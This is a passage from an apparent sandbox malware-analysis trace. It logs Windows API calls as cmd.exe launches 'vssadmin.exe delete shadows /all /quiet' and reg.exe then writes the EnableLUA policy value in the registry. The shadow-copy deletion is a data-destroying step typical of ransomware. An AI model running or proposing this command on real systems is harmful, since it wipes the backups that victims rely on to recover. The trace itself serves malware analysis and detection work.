_String2="DPATH") returned 18 [0071.422] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0071.422] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0071.423] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0071.423] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0071.423] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0071.423] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0071.423] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0071.423] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0071.423] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0071.423] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0071.423] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0071.423] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0071.423] GetProcessHeap () returned 0x2f0000 [0071.423] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30bb30 [0071.424] GetProcessHeap () returned 0x2f0000 [0071.424] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x62) returned 0x30bd50 [0071.424] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0071.424] GetProcessHeap () returned 0x2f0000 [0071.424] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x2f1320 [0071.424] SetErrorMode (uMode=0x0) returned 0x0 [0071.424] SetErrorMode (uMode=0x1) returned 0x0 [0071.424] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f1330, lpFilePart=0x1eeca0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eeca0*="Desktop") returned 0x25 [0071.424] SetErrorMode (uMode=0x0) returned 0x1 [0071.424] GetProcessHeap () returned 0x2f0000 [0071.425] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1320, Size=0x76) returned 0x2f1320 [0071.425] GetProcessHeap () returned 0x2f0000 [0071.425] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1320) returned 0x76 [0071.425] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0071.425] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0071.425] GetProcessHeap () returned 0x2f0000 [0071.425] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x30bdc0 [0071.425] GetProcessHeap () returned 0x2f0000 [0071.425] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x30bef0 [0071.432] GetProcessHeap () returned 0x2f0000 [0071.432] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30bef0, Size=0x12a) returned 0x30bef0 [0071.432] GetProcessHeap () returned 0x2f0000 [0071.432] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30bef0) returned 0x12a [0071.432] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0071.432] GetProcessHeap () returned 0x2f0000 [0071.432] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x30c030 [0071.432] GetProcessHeap () returned 0x2f0000 [0071.432] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30c030, Size=0x7e) returned 0x30c030 [0071.432] GetProcessHeap () returned 0x2f0000 [0071.432] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30c030) returned 0x7e [0071.449] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.449] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0071.449] GetLastError () returned 0x2 [0071.449] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0071.449] GetLastError () returned 0x2 [0071.450] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0071.450] GetLastError () returned 0x2 [0071.450] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0x30c0c0 [0071.450] GetProcessHeap () returned 0x2f0000 [0071.450] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x3045e0 [0071.450] FindClose (in: hFindFile=0x30c0c0 | out: hFindFile=0x30c0c0) returned 1 [0071.450] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0071.450] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0071.450] GetConsoleTitleW (in: lpConsoleTitle=0x1eef60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.450] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eed18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eecd8 | out: lpAttributeList=0x1eed18, lpSize=0x1eecd8) returned 1 [0071.451] UpdateProcThreadAttribute (in: lpAttributeList=0x1eed18, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eecc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eed18, lpPreviousValue=0x0) returned 1 [0071.451] GetStartupInfoW (in: lpStartupInfo=0x1eee30 | out: lpStartupInfo=0x1eee30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2d4, hStdError=0x0)) [0071.451] GetProcessHeap () returned 0x2f0000 [0071.451] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304610 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.451] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0071.452] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0071.452] GetProcessHeap () returned 0x2f0000 [0071.452] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304610 | out: hHeap=0x2f0000) returned 1 [0071.453] GetProcessHeap () returned 0x2f0000 [0071.453] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308900 [0071.453] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0071.454] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1eed50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eed00 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x1eed00*(hProcess=0x54, hThread=0x50, dwProcessId=0x834, dwThreadId=0x844)) returned 1 [0071.486] CloseHandle (hObject=0x50) returned 1 [0071.486] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0071.486] GetProcessHeap () returned 0x2f0000 [0071.486] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ac30 | out: hHeap=0x2f0000) returned 1 [0071.486] GetEnvironmentStringsW () returned 0x30ac30* [0071.487] GetProcessHeap () returned 0x2f0000 [0071.487] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x308a60 [0071.487] FreeEnvironmentStringsW (penv=0x30ac30) returned 1 [0071.487] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0138.328] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1eec48 | out: lpExitCode=0x1eec48*=0x0) returned 1 [0138.328] CloseHandle (hObject=0x54) returned 1 [0138.328] _vsnwprintf (in: _Buffer=0x1eeeb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eec58 | out: _Buffer="00000000") returned 8 [0138.329] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0138.329] GetProcessHeap () returned 0x2f0000 [0138.329] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308a60 | out: hHeap=0x2f0000) returned 1 [0138.329] GetEnvironmentStringsW () returned 0x30c0c0* [0138.329] GetProcessHeap () returned 0x2f0000 [0138.329] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x308a60 [0138.329] FreeEnvironmentStringsW (penv=0x30c0c0) returned 1 [0138.329] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0138.329] GetProcessHeap () returned 0x2f0000 [0138.329] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308a60 | out: hHeap=0x2f0000) returned 1 [0138.329] GetEnvironmentStringsW () returned 0x30c0c0* [0138.329] GetProcessHeap () returned 0x2f0000 [0138.329] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x308a60 [0138.329] FreeEnvironmentStringsW (penv=0x30c0c0) returned 1 [0138.330] GetProcessHeap () returned 0x2f0000 [0138.330] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308900 | out: hHeap=0x2f0000) returned 1 [0138.330] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eed18 | out: lpAttributeList=0x1eed18) [0138.330] _get_osfhandle (_FileHandle=1) returned 0x2d4 [0138.330] SetConsoleMode (hConsoleHandle=0x2d4, dwMode=0x0) returned 0 [0138.330] _get_osfhandle (_FileHandle=1) returned 0x2d4 [0138.330] GetConsoleMode (in: hConsoleHandle=0x2d4, lpMode=0x4a6ae194 | out: lpMode=0x4a6ae194) returned 0 [0138.330] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0138.330] GetConsoleMode (in: hConsoleHandle=0xfffffffffffffffe, lpMode=0x4a6ae198 | out: lpMode=0x4a6ae198) returned 1 [0138.331] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0138.331] SetConsoleMode (hConsoleHandle=0xfffffffffffffffe, dwMode=0x7) returned 0 [0138.331] SetConsoleInputExeNameW () returned 0x1 [0138.331] GetConsoleOutputCP () returned 0x1b5 [0138.331] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0138.331] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0138.332] exit (_Code=0) Process: id = "4" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x3deea000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0x824 [0072.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fe50 | out: lpSystemTimeAsFileTime=0x16fe50*(dwLowDateTime=0x7ab29c80, dwHighDateTime=0x1d6b3a2)) [0072.793] GetCurrentProcessId () returned 0x814 [0072.793] GetCurrentThreadId () returned 0x824 [0072.793] GetTickCount () returned 0x1147b96 [0072.793] QueryPerformanceCounter (in: lpPerformanceCount=0x16fe58 | out: lpPerformanceCount=0x16fe58*=18989889231) returned 1 [0072.794] GetModuleHandleW (lpModuleName=0x0) returned 0xfff50000 [0072.794] __set_app_type (_Type=0x1) [0072.794] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfff600d0) returned 0x0 [0072.794] __wgetmainargs (in: _Argc=0xfff62140, _Argv=0xfff62150, _Env=0xfff62148, _DoWildCard=0, _StartInfo=0xfff6215c | out: _Argc=0xfff62140, _Argv=0xfff62150, _Env=0xfff62148) returned 0 [0072.795] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0072.797] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0072.797] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x16fe28 | out: phkResult=0x16fe28*=0x0) returned 0x2 [0072.797] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0072.797] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0072.797] GetProcessHeap () returned 0x2d0000 [0072.797] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb630 [0072.797] lstrlenW (lpString="") returned 0 [0072.797] GetProcessHeap () returned 0x2d0000 [0072.797] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x2) returned 0x2eb650 [0072.797] GetProcessHeap () returned 0x2d0000 [0072.797] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5a10 [0072.797] GetProcessHeap () returned 0x2d0000 [0072.797] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb670 [0072.797] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5a40 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5a70 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5aa0 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ad0 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb690 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b00 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b30 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b60 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b90 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb6b0 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5bc0 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5bf0 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c20 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c50 [0072.798] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0072.798] GetProcessHeap () returned 0x2d0000 [0072.798] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb6d0 [0072.798] _memicmp (_Buf1=0x2eb6d0, _Buf2=0xfff51458, _Size=0x7) returned 0 [0072.799] GetProcessHeap () returned 0x2d0000 [0072.799] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x1e) returned 0x2e5c80 [0072.799] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0072.799] GetProcessHeap () returned 0x2d0000 [0072.799] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2eb6f0 [0072.799] _memicmp (_Buf1=0x2eb6f0, _Buf2=0xfff51458, _Size=0x7) returned 0 [0072.799] GetProcessHeap () returned 0x2d0000 [0072.799] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x84) returned 0x2eb870 [0072.799] _vsnwprintf (in: _Buffer=0x2e5c80, _BufferCount=0xe, _Format="|%s|", _ArgList=0x16fc28 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0072.799] _vsnwprintf (in: _Buffer=0x2eb870, _BufferCount=0x41, _Format="|%s|", _ArgList=0x16fc28 | out: _Buffer="|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System|") returned 64 [0072.799] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0072.799] lstrlenW (lpString="|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System|") returned 64 [0072.799] SetLastError (dwErrCode=0x490) [0072.799] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0072.799] GetProcessHeap () returned 0x2d0000 [0072.799] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x7e) returned 0x2eb900 [0072.799] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x54) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0072.799] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0072.800] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x79) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0072.801] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0072.801] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0072.801] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0072.801] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0072.801] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") returned 62 [0072.801] StrChrIW 